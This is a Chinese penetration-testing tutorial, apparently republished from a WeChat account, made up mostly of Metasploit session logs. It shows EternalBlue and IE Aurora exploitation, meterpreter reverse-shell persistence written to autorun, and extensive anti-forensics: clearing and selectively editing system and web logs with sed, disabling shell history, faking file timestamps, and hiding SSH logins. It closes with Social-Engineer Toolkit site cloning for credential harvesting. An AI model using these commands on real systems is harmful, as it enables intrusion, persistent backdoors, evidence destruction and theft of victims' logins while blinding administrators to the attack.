[*] Downloading HKU (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\zebuwlsT.reg)
[*] Cleaning HKU
[*] Completed processing on 192.168.0.169:1438...控制持久化
meterpreter > run persistence -X -i 50 -p 8888 -r 192.168.0.106
启动meterpreter:-X
50秒后重连:-i 50
使用端口8888:-p 8888
目的IP 192.168.0.106:-r 192.168.0.106
meterpreter > run persistence -X -i 50 -p 8888 -r 192.168.0.106
[!] Meterpreter scripts are deprecated. Try exploit/windows/local/persistence.
[!] Example: run exploit/windows/local/persistence OPTION=value [...]
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WIN-2VEIIKHJ7M8_20220628.5835/WIN-2VEIIKHJ7M8_20220628.5835.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.0.106 LPORT=8888
[*] Persistent agent script is 99674 bytes long
[+] Persistent Script written to C:\Windows\TEMP\QQxsjpmT.vbs
[*] Executing script C:\Windows\TEMP\QQxsjpmT.vbs
[+] Agent executed with PID 2580
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MdedIPrvpFMB
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MdedIPrvpFMBWindows7成功
将命令行shell升级为Metewrpreter
msf6> use exploit/windows/smb/ms17_010_eternalblue
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > setg rhost 192.168.0.158
rhost => 192.168.0.158
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit -z-z:攻击成功,在后台,不进入
[*] Started reverse TCP handler on 192.168.0.150:4444
[*] 192.168.0.158:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.0.158:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.0.158:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.0.158:445 - The target is vulnerable.
[*] 192.168.0.158:445 - Connecting to target for exploitation.
[+] 192.168.0.158:445 - Connection established for exploitation.
[+] 192.168.0.158:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.0.158:445 - CORE raw buffer dump (40 bytes)
[*] 192.168.0.158:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 48 6f 6d 65 20 42 Windows 7 Home B
[*] 192.168.0.158:445 - 0x00000010 61 73 69 63 20 37 36 30 31 20 53 65 72 76 69 63 asic 7601 Servic
[*] 192.168.0.158:445 - 0x00000020 65 20 50 61 63 6b 20 31 e Pack 1
[+] 192.168.0.158:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.0.158:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.0.158:445 - Sending all but last fragment of exploit packet
[*] 192.168.0.158:445 - Starting non-paged pool grooming
[+] 192.168.0.158:445 - Sending SMBv2 buffers
[+] 192.168.0.158:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.0.158:445 - Sending final SMBv2 buffers.
[*] 192.168.0.158:445 - Sending last fragment of exploit packet!
[*] 192.168.0.158:445 - Receiving response from exploit packet
[+] 192.168.0.158:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.0.158:445 - Sending egg to corrupted connection.
[*] 192.168.0.158:445 - Triggering free of corrupted buffer.
[*] Sending stage (200774 bytes) to 192.168.0.158
[*] Meterpreter session 3 opened (192.168.0.150:4444 -> 192.168.0.158:49321) at 2022-06-28 14:13:48 +0800
[+] 192.168.0.158:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.0.158:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.0.158:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Session 3 created in the background.
msf6 exploit(windows/smb/ms17_010_eternalblue) > session -u 3
[-] Unknown command: session
msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions -u 3
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [3]
[*] Upgrading session ID: 3
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.0.150:4433
msf6 exploit(windows/smb/ms17_010_eternalblue) >
[*] Sending stage (200774 bytes) to 192.168.0.158
[*] Meterpreter session 4 opened (192.168.0.150:4433 -> 192.168.0.158:49325) at 2022-06-28 14:14:39 +0800
[*] Stopping exploit/multi/handler
msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions -i 4
[*] Starting interaction with 4...*/
meterpreter >
meterpreter > irb
[*] Starting IRB shell...
[*] You are in the "client" (session) object
irb: warn: can't alias kill from irb_kill.
>> fs.dir.pwd
=> "C:\\Windows\\system32"对IE浏览器激光漏洞进行渗透利用
Windows XP
msf6 > use exploit/windows/browser/ms10_002_aurora
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/browser/ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(windows/browser/ms10_002_aurora) > show options
Module options (exploit/windows/browser/ms10_002_aurora):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.0.150 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(windows/browser/ms10_002_aurora) > set SRVPORT 80
SRVPORT => 80
msf6 exploit(windows/browser/ms10_002_aurora) > set URIPATH /
URIPATH => /
msf6 exploit(windows/browser/ms10_002_aurora) > set lport 443
lport => 443
msf6 exploit(windows/browser/ms10_002_aurora) > exploit -z
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.0.150:443
[*] Using URL: http://192.168.0.150/
[*] Server started.
msf6 exploit(windows/browser/ms10_002_aurora) > [*] 192.168.0.106 ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption抹杀记录
当我们达到了目的之后,有时候只是为了黑入网站挂黑页,炫耀一下;或者在网站留下一个后门,作为肉鸡,没事的时候上去溜达溜达;亦或者挂入挖矿木马;但是大家千万不要干这些事,这些都是违法的!
我这里只是教大家在渗透进去之后如何清除我们留下的一部分痕迹,并不能完全清除,完全清除入侵痕迹是不可能的!主要是增加管理员发现入侵者的时间成本和人力成本。只要管理员想查,无论你怎么清除,还是能查到的。
最主要还是要以隐藏自身身份为主,最好的手段是在渗透前挂上代理,然后在渗透后痕迹清除。
Windows
PowerShell修改时间命令
$(DATE) 表示当前日期和时间;
(Get-Date) 同(DATE),表示当前日期和时间;
$(Get-Date "MM/DD/YYYY HH24:MI:SS") 表示指定的日期和时间;
$(Get-Item abc.txt) 表示获取文件的句柄;
$(Get-Item abc.txt).creationtime 获取文件创建时间
$(Get-Item abc.txt).lastaccesstime 获取文件最后访问时间
$(Get-Item abc.txt).lastwritetime 获取文件修改时间
# 设置文件test.txt的时间为当前时间
(Get-Item abc.txt).creationtime=(DATE)
(Get-Item abc.txt).lastaccesstime=(DATE)
(Get-Item abc.txt).lastwritetime=(DATE)
# 设置文件abc.txt的时间为指定的某个时间
(Get-Item abc.txt).creationtime=(Get-Date "11/04/2019 20:42:23")
(Get-Item abc.txt).lastaccesstime=(Get-Date "11/04/2019 20:42:23")
(Get-Item abc.txt).lastwritetime=(Get-Date "11/04/2019 20:42:23")
其他记录
清理“运行”中的历史记录
- 开始菜单中的“运行”菜单里保存着我们通过它运行过的程序及所打开的文件路径与名称。
- 进入注册表编辑器,找到HKEY_CURRENT_ USER\Sortware\Microsoft\Windows\Currentversion\Esploier\Runmru分支。从中选择不需要的或不想要别人看到的记录删除即可。
清理“查找”中的历史记录
- (1)、清理查找计算机的历史记录
- 进入注册表编辑器,找到HKEY_CURRENT_USER\Software\Microsoft\Search Assistant\ACMru\5647分支,选择不需要的或是不想让别人看到的记录删除即可。
- (2)清理查找文件的历史记录
进入注册表编辑器,找到HKEY_CURRENT_USER\Software\Microsoft\Search Assistant\ACMru\5603分支,从中选择不需要的或是不想让别人看到的记录删除即可。
清理“我最近的文档”中的历史记录
- 在任务栏上右单击,打开“任务栏和开始菜单属性”对话框。单击“开始菜单”“自定义”“高级”,单击“清理”按钮即可清理最近访问过的全部文档。如图2。
- 如果只想删除自己的记录,可以进入资源管理器中的“C:\Documentsnnd Settings\Adminnisyror(用户自己的帐号)\Recent”文件夹,删去自己不想要别人看到的文档即可。
禁止显示上一次登录者的名称
进入注册表编辑器,找到HKEY_ LOCAL_ MACHINE \ Software \ Microsoft \ windowsNT \ Currentversion \ Winlogin 分支,新建一个“DontDisplayLastUserName”的字符串值,并设为“1”,重新启动后,就再不会显示上次登录的用户名了,当需要显示上次登录的用户名时设为“0”即可。
清理“回收站”
- 在windows中简单地删除文件只是将文件转移到了“回收站”中,随时可以恢复查看。比较保险的做法是按住shift再点“删除”,或右击桌面上的“回收站”,选择“属性”,在“全局”选项卡中选择“所有驱动器均使用同一设置”,然后勾选下方的“删除时不将文件移回回收站,而是直接删除”,单击“确定”。
清理剪切板中的记录
- 剪贴板里有时会隐藏着我们太多的秘密,如果不关机就直接离开,下一个上机的人只要按一下Ctrl+V,刚才在剪贴板中的信息就被别人“盗取”了。无需研究如何清空剪贴板,只需用Ctrl+C再随便复制一段无关的内容,原来的内容就会被覆盖。
清理TEMP文件夹中的记录
- 许多应用程序通常会临时保存你的工作结果,离机前应删除被存放在C:\(系统安装盘符)Documents and Settings\Administrator(当前登录用户)\Local Settings\Temp目录下的临时文件。
Linux
修改文件时间戳
ls -l test.txt
# 修改文件的修改时间和访问时间
touch -d "2018-04-18 08:00:00" test.txt
touch -t 0101080000 test清除history历史命令记录
#方法1
history # 查看历史操作命令(在Kali Linux下无效)
cat ~/.bash_history # history记录文件
vim ~/.bash_history
history –c#方法2
使用vim打开一个文件
vim test.txt
# 设置vim不记录命令,vim会将命令历史记录,保存在viminfo文件中。
:set history=0
:!command#方法3
#通过修改配置文件/etc/profile,使系统不再保存命令记录。默认情况下历史命令将保存1000条,可以将该值改为0,然后保存并退出,最后重启系统使得配置文件生效。
HISTSIZE=0#方法4
#登录后执行下面命令,不记录历史命令(.bash_history)
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0#方法5
仅在Kali Linux下
rm -rf /root/.zsh_history清除系统日志痕迹
/var/log/btmp 记录所有登录失败信息,使用lastb命令查看
/var/log/lastlog 记录系统中所有用户最后一次登录时间的日志,使用lastlog命令查看
/var/log/wtmp记录所有用户的登录、注销信息,使用last命令查看
/var/log/utmp记录当前已经登录的用户信息,使用w,who,users等命令查看
/var/log/secure 记录与安全相关的日志信息
/var/log/message 记录系统启动后的信息和错误日志
echo > /var/log/btmp:#清除登录系统失败的记录,查看用lastb命令
echo > /var/log/wtmp:#清除登录系统成功的记录,查看用last命令
echo > /var/log/lastlog:清除用户最后一次登录时间,查看用lastlog命令
echo >/var/log/utmp:清除当前登录用户的信息,查看使用w,who,users等命令
cat /dev/null >/var/log/secure:清除安全日志记录
cat /dev/null >/var/log/message:清除系统日志记录
echo > /var/log/secure //登录信息
echo > /var/log/messages
echo>/var/log/syslog //记录系统日志的服务
echo>/var/log/xferlog
echo>/var/log/auth.log
echo>/var/log/user.log
cat /dev/null > /var/adm/sylog
cat /dev/null > /var/log/maillog
cat /dev/null > /var/log/openwebmail.log
cat /dev/null > /var/log/mail.info
清除系统日志痕迹
#日志文件全部被清空,太容易被管理员察觉了,如果只是删除或替换部分关键日志信息,那么就可以完美隐藏攻击痕迹。
# 删除所有匹配到字符串的行,比如以当天日期或者自己的登录IP
sed -i '/自己的ip/'d test.txt
sed -i '/192.168.1.2/'d test.txt
# 全局替换登录IP地址:
sed 's/要被取代的字串/新的字串/g'
sed -i 's/192.168.1.1/192.168.1.2/g' test.txt
隐藏远程SSH登录记录
#隐身登录系统,不会被w、who、last等指令检测到。
ssh -T root@192.168.0.1 /bin/bash -i
#不记录ssh公钥在本地.ssh目录中
ssh -o UserKnownHostsFile=/dev/null -T user@host /bin/bash –I
清除Web入侵痕迹
#直接替换日志ip地址
sed -i 's/192.168.166.85/192.168.1.1/g' apache/logs/access.log
#常见日志地址
Apache
%APATCH_HOME%//logs/access.log # 访问日志
%APATCH_HOME%/logs/error.log # 错误日志
Nginx
%NHINX_HOME%/logs/access.log # 访问日志
%NHINX_HOME%/logs/error.log # 错误日志
Tomcat
%TOMCAT_HOME%/logs/localhost_access_log.YYYY_MM_DD.txt # 请求日志
%TOMCAT_HOME%/logs/catalina.YYYY_MM_DD.log # 启动日志
%TOMCAT_HOME%/logs/localhost.YYYY_MM_DD.log # 本地日志
%TOMCAT_HOME%/logs/host-manager.YYYY_MM_DD.log # manager管理日志
%TOMCAT_HOME%/logs/manager.YYYY_MM_DD.log # manager专有日志
清除MySQL痕迹
rm ~/.mysql_history
cat /dev/null > ~/.mysql_history社会工程学
git clone https://github.com/trustedsec/social-engineer-toolkit/
setoolkit/
cd setoolkit
pip3 install -r requirements.txt
python setup.py
gedit /etc/setoolkit/set.config网络钓鱼攻击(Spear-Phishing Attack Vector)
利用文件格式漏洞(如PDF)等生成后门并通过email(GMAIL,SENDMAIL,)向目标发送带后门附件的电子邮件,诱使目标打开附件激活后门。
例子:
#cd /usr/share/set
# ./setoolkit select from the menu
1) Social-Engineering Attacks
1) Perform a Mass Email Attack
3) Credential Harvester Attack Method
2) Site Cloner
…
set:webattack> IP address for the POST back in Harvester/Tabnabbing [192.168.0.150]: 192.168.0.150
set:webattack> Enter the url to clone: www.baidu.com
[*] Cloning the website: http://www.baidu.com
[*] This could take a little bit...
The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website.
[*] The Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
WEB 方式攻击
SET 可以克隆一个网站并植入后门以此迷惑目标打开此网站并中招。
Java Applet 方式
最成功的方式之一,并不是利用java 的漏洞,而是当目标浏览含后门的仿冒站点时会被询问是否允许执行web 中的java applet,一旦点击允许则payload 开始运行,目标将被重定向到真实的网站。
用户端(Client-side)web exploit 方式
利用用户端存在的软件漏洞,一般使用0day进行攻击的效果最好。
账号密码获取(Username and Password Harvesting)
通过克隆一个目标站并诱使攻击目标登陆,截获其账号密码。例如截获GMAIL 密码。
标签页绑架(Tabnabbing):当目标打开多个标签页浏览网站并切换标签页时,网站侦测到目标的行为并显示让目标等待的信息,恰好目标打开了被绑架的标签页并要求在相似程度惊人的网站里输入登陆凭据,当目标输入之后登陆信息即被截获,同时被重定向到真实网站。
中间人攻击(Man-Left-in-the-Middle)
此方式使用已经被攻陷的网站的HTTP 请求或者网站的XSS 漏洞让用户的登陆信息发送至攻击者的HTTP 服务器。如果你发现了一个网站的XSS 漏洞,可以利用此漏洞构造一个URL发送给目标诱使其打开并登陆以截获登陆信息。
Web Jacking
当目标打开我们的网站时会有一个链接显示为正确的web 地址,此时若目标打开此仿冒链接会被定向到我们的仿冒网站,其登陆信息会被截获。
混合模式(multi-attack)
可同时使用以上多种攻击手段以提高成功率。
介质感染攻击(Infectious Media Generator)
可以让你生成一张光盘或者U盘,里面包含autorun.inf 来运行指定的后门文件或者file-format 漏洞文件。
迷你USB 人机接口设备(Teensy USB HID)
当电脑插入USB 设备且autorun.inf 被禁用时,可使用此方法将USB 设备模拟成一个键盘或鼠标设备,进而截获目标机器的击键记录。
SET 其他特殊功能
包括SET 交互式shell,可用来替代meterpreter;远程管理工具(RATTE);HTTP 隧道,当目标主机只开放HTTP 端口对外放行时可通过此功能与主机进行通信;WEB-GUI,包含了常用攻击和无线攻击向导,输入./set-web 即可运行。
本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2022-07-22,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读